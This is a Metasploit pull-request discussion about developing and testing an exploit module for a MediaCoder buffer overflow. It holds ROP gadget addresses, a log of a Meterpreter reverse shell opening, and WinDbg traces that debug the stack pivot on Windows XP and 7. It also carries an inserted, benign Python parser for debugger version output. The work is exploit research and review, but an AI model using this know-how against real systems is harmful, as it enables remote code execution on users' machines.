Added MediaCoder exploit module #2081

Merged
merged 7 commits into from Jul 12, 2013

Conversation

@modpr0be modpr0be commented Jul 6, 2013

This is an exploit module for the MediaCoder exploit from exploit-db.com, EDB-ID 26403.

end

def nops(rop=false, n=1)
return rop ? [0x6ab21799] * n : [0x90909090] * n
Contributor:
I guess this gadget (ret gadget at 0x6ab21799?) is target specific (MediaCoder 0.8.23.5530 in this case). If that's the case, it should be in the target metadata.

Contributor Author:
Yes, you're correct. I'll change it to 0x6ab16202 from swscale-2.dll; that would be universal, I think.

end

def junk(n=1)
return [rand_text_alpha(4).unpack("L")[0]] * n
Contributor:
Why is the random text repeated n times instead of generating different junk by calling rand_text_alpha(4).unpack("L")[0] n times? That would make the exploit's junk code more random when n > 1.

@jvazquez-r7
Contributor

'Author' =>
[
'metacom', # Vulnerability discovery and PoC
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
Contributor:
A comma is needed at the end of the entry.

Contributor Author:
Strange, msftidy doesn't complain about it. I'll add it in the next commit.

Contributor:
msftidy doesn't check this. But if you run msfconsole, you will see a complaint though :-)

wchen-r7 commented Jul 8, 2013

Works for me on Win XP SP3:

msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.0.1.79
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.79:2796) at 2013-07-08 14:41:38 -0500

meterpreter >

mediacoder version:

0:006> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder C (no symbols)           
    Loaded symbol image file: C:\Program Files\MediaCoder\mediacoder.exe
    Image path: C:\Program Files\MediaCoder\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Sat Jun 29 23:00:19 2013 (51CFAD53)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    File flags:       8 (Mask 1F) Private
    File OS:          4 Unknown Win32
    File type:        0.0 Unknown
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Broad Intelligence
    ProductName:      MediaCoder
    InternalName:     mediacoder
    OriginalFilename: MediaCoder.exe
    ProductVersion:   0, 8, 23, 5530
    FileVersion:      0, 8, 23, 5530
    FileDescription:  MediaCoder
    LegalCopyright:   (C)2005-2013 Developed by Stanley Huang All Rights Reserved
    LegalTrademarks:  MediaCoder
    Comments:         http://www.mediacoderhq.com
Missing image name, possible paged-out or corrupt data.

Juan, are you on XP too?
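
The `lmv` output above is worth reading carefully: the fixed-info `File version` says 0.8.22.0 while the string-table `FileVersion`/`ProductVersion` say 0, 8, 23, 5530. Inventory or vulnerability-management tooling that reads only one of the two fields will report a different build than the one actually tested here. The following parser is an added example for this thread (not code from the PR or from Metasploit); it pulls both fields out of a `lmv m <module>` dump and flags the mismatch. The sample text is constructed from the fields visible above.

```python
"""Parse WinDbg `lmv m <module>` output and compare its two version fields.

Added example for this thread, not code from the PR or Metasploit.
`lmv` prints the PE's fixed VS_FIXEDFILEINFO block ("File version",
"Product version") and the StringFileInfo table ("FileVersion",
"ProductVersion"); they can disagree, as they do for this MediaCoder build.
"""
import re

# Constructed sample: the same field layout WinDbg printed in the thread.
SAMPLE_LMV = """\
0:006> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder C (no symbols)
    Loaded symbol image file: C:\\Program Files\\MediaCoder\\mediacoder.exe
    Image path: C:\\Program Files\\MediaCoder\\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Sat Jun 29 23:00:19 2013 (51CFAD53)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    ProductName:      MediaCoder
    ProductVersion:   0, 8, 23, 5530
    FileVersion:      0, 8, 23, 5530
    FileDescription:  MediaCoder
"""

# "start end name" line: two 8-digit hex addresses followed by the module name.
MODULE_RE = re.compile(r"^([0-9a-fA-F]{8})\s+([0-9a-fA-F]{8})\s+(\S+)")
# Indented "Key: value" lines (key may contain spaces, e.g. "File version").
FIELD_RE = re.compile(r"^\s+([A-Za-z ]+?):\s+(.*)$")


def parse_lmv(text):
    """Return {'name', 'start', 'end', 'fields': {...}} for the first module listed."""
    info = {"fields": {}}
    for line in text.splitlines():
        m = MODULE_RE.match(line)
        if m and "name" not in info:
            info["start"] = int(m.group(1), 16)
            info["end"] = int(m.group(2), 16)
            info["name"] = m.group(3)
            continue
        f = FIELD_RE.match(line)
        if f:
            info["fields"][f.group(1).strip()] = f.group(2).strip()
    return info


def version_tuple(s):
    """Normalise both '0.8.22.0' and '0, 8, 23, 5530' to a tuple of ints."""
    return tuple(int(p) for p in re.split(r"[.,]\s*", s.strip()))


def version_report(info):
    """Compare the fixed-info file version with the string-table FileVersion."""
    fixed = version_tuple(info["fields"]["File version"])
    string = version_tuple(info["fields"]["FileVersion"])
    return {"fixed": fixed, "string": string, "mismatch": fixed != string}


if __name__ == "__main__":
    mod = parse_lmv(SAMPLE_LMV)
    print("%s @ %08x-%08x" % (mod["name"], mod["start"], mod["end"]))
    print(version_report(mod))
```

When you record "affected version" for a build like this, state which field you read; the thread's own 0.8.23.5530 comes from the string table, and the fixed-info field would have put the same binary at 0.8.22.0.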

@jvazquez-r7
Contributor

No, Win 7 SP1. Okay, giving it a new chance, starting with XP SP3, 8.23.5530.

@jvazquez-r7
Contributor

Windows XP SP3 with Windows XP SP3 8.23.5530

0:017> version
Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 5.1.2600.5512 (xpsp.080413-2111)
Machine Name:
Debug session time: Mon Jul  8 23:10:00.158 2013 (UTC + 2:00)
System Uptime: 0 days 0:12:38.916
Process Uptime: 0 days 0:01:48.859
  Kernel time: 0 days 0:00:01.343
  User time: 0 days 0:00:00.765
Live user mode: <Local>

Microsoft (R) Windows Debugger Version 6.2.8400.0 X86
Copyright (c) Microsoft Corporation. All rights reserved.

command line: '"C:\Program Files\Windows Kits\8.0\Debuggers\x86\windbg.exe" '  Debugger Process 0xC3C 
dbgeng:  image 6.2.8400.0, built Sat May 19 05:26:21 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbgeng.dll]
dbghelp: image 6.2.8400.0, built Sat May 19 05:29:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbghelp.dll]
        DIA version: 50127
Extension DLL search Path:
    C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\arcade;C:\Program Files\Windows Kits\8.0\Debuggers\x86\pri;C:\Program Files\Windows Kits\8.0\Debuggers\x86;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
Extension DLL chain:
    dbghelp: image 6.2.8400.0, API 6.2.6, built Sat May 19 05:29:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbghelp.dll]
    ext: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:34:27 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\ext.dll]
    exts: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:39:52 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP\exts.dll]
    uext: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:39:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\uext.dll]
    ntsdexts: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:40:37 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP\ntsdexts.dll]
0:017> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder   (deferred)             
    Image path: C:\Program Files\MediaCoder\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Sun Jun 30 06:00:19 2013 (51CFAD53)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    File flags:       8 (Mask 1F) Private
    File OS:          4 Unknown Win32
    File type:        0.0 Unknown
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Broad Intelligence
    ProductName:      MediaCoder
    InternalName:     mediacoder
    OriginalFilename: MediaCoder.exe
    ProductVersion:   0, 8, 23, 5530
    FileVersion:      0, 8, 23, 5530
    FileDescription:  MediaCoder
    LegalCopyright:   (C)2005-2013 Developed by Stanley Huang All Rights Reserved
    LegalTrademarks:  MediaCoder
    Comments:         http://www.mediacoderhq.com

Oooough! Finally triggered... I needed to interact several times with the GUI to make it crash, btw: add the list, click the link, lose the window focus, get the window focus, click the link again:

0:000> !exchain
0012f434: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at b7b011ca

This time the ret is well aligned and calc spawns:

0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7c9032bc esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f4bc ebp=6ab16202 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp
0012f4bc  6ab16202 6ab16202 6ab16202 100482ff
0012f4cc  ffffffc0 79544b74 66d9d9ba 6ab2241d
0012f4dc  69686872 69686872 69686872 69686872
0012f4ec  69686872 69686872 69686872 69686872
0012f4fc  69686872 69686872 69686872 69686872
0012f50c  69686872 69686872 69686872 1004cc03
0012f51c  6ab561b0 66d9feee 6ab19780 66d929f5
0012f52c  fffffcc0 62527569 6ab3c65a 1004cc03
0:000> g

Now switching to Win 7 SP1.

@jvazquez-r7
Contributor

Again no luck on Win 7 SP1 on my tests, sorry:


Microsoft (R) Windows Debugger Version 6.2.8400.0 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is: 
ModLoad: 00400000 005c7000   C:\Program Files\MediaCoder\mediacoder.exe
ModLoad: 778e0000 77a1c000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 76d80000 76e54000   C:\Windows\system32\kernel32.dll
ModLoad: 75b60000 75baa000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 776e0000 77780000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 77240000 772ec000   C:\Windows\system32\msvcrt.dll
ModLoad: 77a20000 77a39000   C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76ac0000 76b61000   C:\Windows\system32\RPCRT4.dll
ModLoad: 713b0000 713c9000   C:\Windows\system32\AVIFIL32.dll
ModLoad: 76bc0000 76c89000   C:\Windows\system32\USER32.dll
ModLoad: 77690000 776de000   C:\Windows\system32\GDI32.dll
ModLoad: 76ab0000 76aba000   C:\Windows\system32\LPK.dll
ModLoad: 76a10000 76aad000   C:\Windows\system32\USP10.dll
ModLoad: 71360000 71392000   C:\Windows\system32\WINMM.dll
ModLoad: 77780000 778dc000   C:\Windows\system32\ole32.dll
ModLoad: 70e50000 70e64000   C:\Windows\system32\MSACM32.dll
ModLoad: 6f030000 6f051000   C:\Windows\system32\MSVFW32.dll
ModLoad: 75dc0000 76a0a000   C:\Windows\system32\SHELL32.dll
ModLoad: 76cf0000 76d47000   C:\Windows\system32\SHLWAPI.dll
ModLoad: 727d0000 72854000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll
ModLoad: 75d40000 75dbb000   C:\Windows\system32\COMDLG32.dll
ModLoad: 729c0000 729dc000   C:\Windows\system32\IPHLPAPI.DLL
ModLoad: 77310000 77316000   C:\Windows\system32\NSI.dll
ModLoad: 729b0000 729b7000   C:\Windows\system32\WINNSI.DLL
ModLoad: 10000000 10092000   C:\Program Files\MediaCoder\jpeg.dll
ModLoad: 66000000 660fb000   C:\Program Files\MediaCoder\libiconv-2.dll
ModLoad: 001d0000 001f9000   C:\Program Files\MediaCoder\mccommon.dll
ModLoad: 00330000 003ce000   C:\Program Files\MediaCoder\libxml2.dll
ModLoad: 76e60000 76f55000   C:\Windows\system32\WININET.dll
ModLoad: 77320000 77456000   C:\Windows\system32\urlmon.dll
ModLoad: 77160000 771ef000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 75c10000 75d2d000   C:\Windows\system32\CRYPT32.dll
ModLoad: 75aa0000 75aac000   C:\Windows\system32\MSASN1.dll
ModLoad: 76f60000 7715b000   C:\Windows\system32\iertutil.dll
ModLoad: 6afc0000 6afeb000   C:\Program Files\MediaCoder\postproc-52.dll
ModLoad: 66d80000 66dc5000   C:\Program Files\MediaCoder\avutil-52.dll
ModLoad: 75d30000 75d35000   C:\Windows\system32\PSAPI.DLL
ModLoad: 6e170000 6e1f0000   C:\Program Files\MediaCoder\SDL.dll
ModLoad: 6efd0000 6f026000   C:\Program Files\MediaCoder\SDL_image.dll
ModLoad: 6ab00000 6ab5b000   C:\Program Files\MediaCoder\swscale-2.dll
ModLoad: 727c0000 727c7000   C:\Windows\system32\WSOCK32.dll
ModLoad: 76b70000 76ba5000   C:\Windows\system32\WS2_32.dll
ModLoad: 772f0000 7730f000   C:\Windows\system32\IMM32.DLL
ModLoad: 77a40000 77b0c000   C:\Windows\system32\MSCTF.dll
ModLoad: 74840000 74880000   C:\Windows\system32\uxtheme.dll
ModLoad: 74510000 74523000   C:\Windows\system32\dwmapi.dll
ModLoad: 75980000 7598c000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 00700000 00738000   C:\Program Files\MediaCoder\mcres.dll
ModLoad: 72770000 72782000   C:\Windows\system32\dhcpcsvc.DLL
ModLoad: 75470000 754ac000   C:\Windows\system32\mswsock.dll
ModLoad: 74fc0000 74fc5000   C:\Windows\System32\wshtcpip.dll
ModLoad: 00740000 0074f000   C:\Program Files\MediaCoder\plugins\dsp_chmx.dll
ModLoad: 00750000 00756000   C:\Program Files\MediaCoder\plugins\dsp_zsc.dll
ModLoad: 018d0000 01908000   C:\Program Files\MediaCoder\SysInfo.dll
ModLoad: 74f30000 74f39000   C:\Windows\system32\VERSION.dll
ModLoad: 749c0000 74b5e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
ModLoad: 75910000 7592b000   C:\Windows\system32\SspiCli.dll
ModLoad: 75a30000 75a3b000   C:\Windows\system32\profapi.dll
ModLoad: 74040000 74061000   C:\Windows\system32\ntmarta.dll
ModLoad: 771f0000 77235000   C:\Windows\system32\WLDAP32.dll
ModLoad: 75330000 75374000   C:\Windows\system32\dnsapi.DLL
ModLoad: 6f450000 6f4a2000   C:\Windows\system32\RASAPI32.dll
ModLoad: 6f620000 6f635000   C:\Windows\system32\rasman.dll
ModLoad: 73a30000 73a3d000   C:\Windows\system32\rtutils.dll
ModLoad: 713a0000 713a6000   C:\Windows\system32\sensapi.dll
ModLoad: 77460000 774e3000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 73490000 734ea000   C:\Windows\System32\netprofm.dll
ModLoad: 74130000 74140000   C:\Windows\System32\nlaapi.dll
ModLoad: 754b0000 754c6000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 75250000 7528b000   C:\Windows\system32\rsaenh.dll
ModLoad: 75a20000 75a2e000   C:\Windows\system32\RpcRtRemote.dll
ModLoad: 73190000 73198000   C:\Windows\System32\npmproxy.dll
ModLoad: 71970000 71980000   C:\Windows\system32\napinsp.dll
ModLoad: 71950000 71962000   C:\Windows\system32\pnrpnsp.dll
ModLoad: 71940000 71948000   C:\Windows\System32\winrnr.dll
ModLoad: 71930000 7193d000   C:\Windows\system32\wshbth.dll
ModLoad: 75460000 75466000   C:\Windows\System32\wship6.dll
ModLoad: 735c0000 735c6000   C:\Windows\system32\rasadhlp.dll
ModLoad: 72870000 728a8000   C:\Windows\System32\fwpuclnt.dll
ModLoad: 6e280000 6ed00000   C:\Windows\System32\ieframe.dll
ModLoad: 6e240000 6e27c000   C:\Windows\System32\OLEACC.dll
ModLoad: 75930000 7597c000   C:\Windows\system32\apphelp.dll
ModLoad: 76bb0000 76bb3000   C:\Windows\system32\Normaliz.dll
ModLoad: 6e210000 6e23e000   C:\Windows\system32\MLANG.dll
ModLoad: 72250000 723bf000   C:\Windows\system32\explorerframe.dll
ModLoad: 745c0000 745ef000   C:\Windows\system32\DUser.dll
ModLoad: 745f0000 746a2000   C:\Windows\system32\DUI70.dll
ModLoad: 6b2b0000 6b867000   C:\Windows\System32\mshtml.dll
ModLoad: 718e0000 7190a000   C:\Windows\System32\msls31.dll
ModLoad: 70070000 7007b000   C:\Windows\system32\msimtf.dll
ModLoad: 6e0b0000 6e162000   C:\Windows\System32\jscript.dll
ModLoad: 71860000 7186b000   C:\Windows\system32\ImgUtil.dll
ModLoad: 6fd30000 6fd3e000   C:\Windows\System32\pngfilt.dll
ModLoad: 75990000 759ef000   C:\Windows\system32\SXS.DLL
ModLoad: 74880000 74975000   C:\Windows\system32\propsys.dll
ModLoad: 774f0000 7768d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75bb0000 75bd7000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 75ab0000 75ac2000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 74530000 74569000   C:\Windows\system32\MMDevAPI.DLL
ModLoad: 70f90000 70fc0000   C:\Windows\system32\wdmaud.drv
ModLoad: 70f80000 70f84000   C:\Windows\system32\ksuser.dll
ModLoad: 74070000 74077000   C:\Windows\system32\AVRT.dll
ModLoad: 70f30000 70f66000   C:\Windows\system32\AUDIOSES.DLL
ModLoad: 70e70000 70e78000   C:\Windows\system32\msacm32.drv
ModLoad: 70e40000 70e47000   C:\Windows\system32\midimap.dll
ModLoad: 75090000 750a7000   C:\Windows\system32\USERENV.dll
ModLoad: 75be0000 75c0d000   C:\Windows\system32\wintrust.dll
ModLoad: 752c0000 752fa000   C:\Windows\system32\schannel.DLL
ModLoad: 6d980000 6dab3000   C:\Windows\System32\msxml3.dll
ModLoad: 742a0000 742af000   C:\Windows\system32\wkscli.dll
ModLoad: 742b0000 742b9000   C:\Windows\system32\netutils.dll
ModLoad: 75180000 75188000   C:\Windows\system32\credssp.dll
ModLoad: 744e0000 7450f000   C:\Windows\system32\XmlLite.dll
ModLoad: 758f0000 758f8000   C:\Windows\system32\secur32.dll
ModLoad: 75600000 75638000   C:\Windows\system32\ncrypt.dll
ModLoad: 755e0000 755f7000   C:\Windows\system32\bcrypt.dll
ModLoad: 75190000 751cd000   C:\Windows\system32\bcryptprimitives.dll
ModLoad: 75070000 75086000   C:\Windows\system32\GPAPI.dll
ModLoad: 6fc70000 6fc8c000   C:\Windows\system32\cryptnet.dll
ModLoad: 73000000 73015000   C:\Windows\system32\Cabinet.dll
ModLoad: 75230000 7523e000   C:\Windows\system32\DEVRTL.dll
(434.44c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 
eax=7ffa5000 ebx=00000000 ecx=00000000 edx=7797f125 esi=00000000 edi=00000000
eip=779140f0 esp=060eff5c ebp=060eff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
779140f0 cc              int     3
0:023> .symfix
0:023> .reload
Reloading current modules
................................................................
.........................................................
0:023> g
ModLoad: 6fd20000 6fd25000   C:\Windows\system32\msimg32.dll
ModLoad: 71880000 718d8000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 743e0000 744db000   C:\Windows\system32\WindowsCodecs.dll
ModLoad: 72150000 72181000   C:\Windows\system32\EhStorShell.dll
ModLoad: 720e0000 7214a000   C:\Windows\System32\cscui.dll
ModLoad: 720d0000 720d9000   C:\Windows\System32\CSCDLL.dll
ModLoad: 720c0000 720cb000   C:\Windows\system32\CSCAPI.dll
ModLoad: 72050000 720c0000   C:\Windows\system32\ntshrui.dll
ModLoad: 75880000 75899000   C:\Windows\system32\srvcli.dll
ModLoad: 73da0000 73daa000   C:\Windows\system32\slc.dll
ModLoad: 72e10000 72ea4000   C:\Windows\system32\MsftEdit.dll
ModLoad: 6cae0000 6cb3c000   C:\Windows\System32\StructuredQuery.dll
ModLoad: 71f30000 71f7e000   C:\Windows\system32\actxprxy.dll
ModLoad: 6bc00000 6bc2b000   C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 6df50000 6df66000   C:\Windows\system32\thumbcache.dll
ModLoad: 72190000 721be000   C:\Windows\system32\SHDOCVW.dll
ModLoad: 6c740000 6c7e0000   C:\Windows\system32\SearchFolder.dll
ModLoad: 716c0000 71858000   C:\Windows\system32\NetworkExplorer.dll
ModLoad: 71f20000 71f29000   C:\Windows\system32\LINKINFO.dll
ModLoad: 74290000 7429f000   C:\Windows\system32\samcli.dll
ModLoad: 74980000 74992000   C:\Windows\system32\SAMLIB.dll
ModLoad: 077a0000 0798d000   geany.exe
ModLoad: 077a0000 0798d000   geany.exe
ModLoad: 077a0000 07834000   burn.exe
ModLoad: 077a0000 07a52000   procexp.exe
ModLoad: 077a0000 07a52000   procexp.exe
ModLoad: 077a0000 07967000   image077a0000
ModLoad: 077a0000 07967000   image077a0000
ModLoad: 077a0000 091c0000   mplayer.exe
(434.88c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
eax=000000f1 ebx=76bcad60 ecx=04f6c578 edx=fb1c3a88 esi=005308c8 edi=000701dc
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at b7b011ca
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=779271cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=779271cd esi=00000000 edi=00000000
eip=6afd443b esp=0012f304 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> t
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=00000000 edi=00000000
eip=6afd443c esp=0012f308 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=2c130153 edi=00000000
eip=6afd443d esp=0012f30c ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=2c130153 edi=d3265f27
eip=6afd443e esp=0012f310 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=2c130153 edi=d3265f27
eip=6afd443f esp=0012f314 ebp=94946d13 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp
0012f314  87ae76d4 98f5b5e2 1a7c0e92 33f07a57
0012f324  13418be4 f142122f 3e4f3b66 86c2f9cb
0012f334  17e28bd5 5fc75e54 aed0b9a1 25a8b464
0012f344  2e3f8f4c c5f13b01 903c9a29 20acbe56
0012f354  8e938a04 f9522618 d8a1b196 a3fa7242
0012f364  9858b70c 7eaec68d bfc1e5b6 60da95ff
0012f374  43110675 760493a8 2c5ab6ef 0796dd1b
0012f384  2b271255 6a30b916 a8a09d08 c4cc5283
0:000> g
(434.88c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=2c130153 edi=d3265f27
eip=87ae76d4 esp=0012f318 ebp=94946d13 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210212
87ae76d4 ??              ???
0:000> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder C (no symbols)           
    Loaded symbol image file: C:\Program Files\MediaCoder\mediacoder.exe
    Image path: C:\Program Files\MediaCoder\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Sun Jun 30 06:00:19 2013 (51CFAD53)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    File flags:       8 (Mask 1F) Private
    File OS:          4 Unknown Win32
    File type:        0.0 Unknown
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Broad Intelligence
    ProductName:      MediaCoder
    InternalName:     mediacoder
    OriginalFilename: MediaCoder.exe
    ProductVersion:   0, 8, 23, 5530
    FileVersion:      0, 8, 23, 5530
    FileDescription:  MediaCoder
    LegalCopyright:   (C)2005-2013 Developed by Stanley Huang All Rights Reserved
    LegalTrademarks:  MediaCoder
    Comments:         http://www.mediacoderhq.com
0:000> version
Windows 7 Version 7601 (Service Pack 1) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Machine Name:
Debug session time: Mon Jul  8 23:28:56.105 2013 (UTC + 2:00)
System Uptime: 0 days 0:07:36.480
Process Uptime: 0 days 0:01:17.513
  Kernel time: 0 days 0:00:00.920
  User time: 0 days 0:00:00.795
Live user mode: <Local>

Microsoft (R) Windows Debugger Version 6.2.8400.0 X86
Copyright (c) Microsoft Corporation. All rights reserved.

command line: '"C:\Program Files\Windows Kits\8.0\Debuggers\x86\windbg.exe" '  Debugger Process 0xAE8 
dbgeng:  image 6.2.8400.0, built Sat May 19 05:26:21 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbgeng.dll]
dbghelp: image 6.2.8400.0, built Sat May 19 05:29:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbghelp.dll]
        DIA version: 50127
Extension DLL search Path:
    C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\arcade;C:\Program Files\Windows Kits\8.0\Debuggers\x86\pri;C:\Program Files\Windows Kits\8.0\Debuggers\x86;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\arcade;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
Extension DLL chain:
    dbghelp: image 6.2.8400.0, API 6.2.6, built Sat May 19 05:29:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbghelp.dll]
    ext: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:34:27 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\ext.dll]
    exts: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:39:52 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP\exts.dll]
    uext: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:39:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\uext.dll]
    ntsdexts: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:40:37 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP\ntsdexts.dll]


wchen-r7 commented Jul 8, 2013

Notice on Windows 7, both Juan and I have the exact same ESP address when we do the "ADD ESP, 7ACh" alignment, and then we both experience the same crash due to a bad landing. The ESP address at the time of the alignment also appears to be consistent after retries. I did a quick comparison between a successful attempt on XP vs Win 7, it looks like we're still 0x168 bytes off from the ROP NOP we need:

0:000> r
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77ba71cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
...
0:000> p
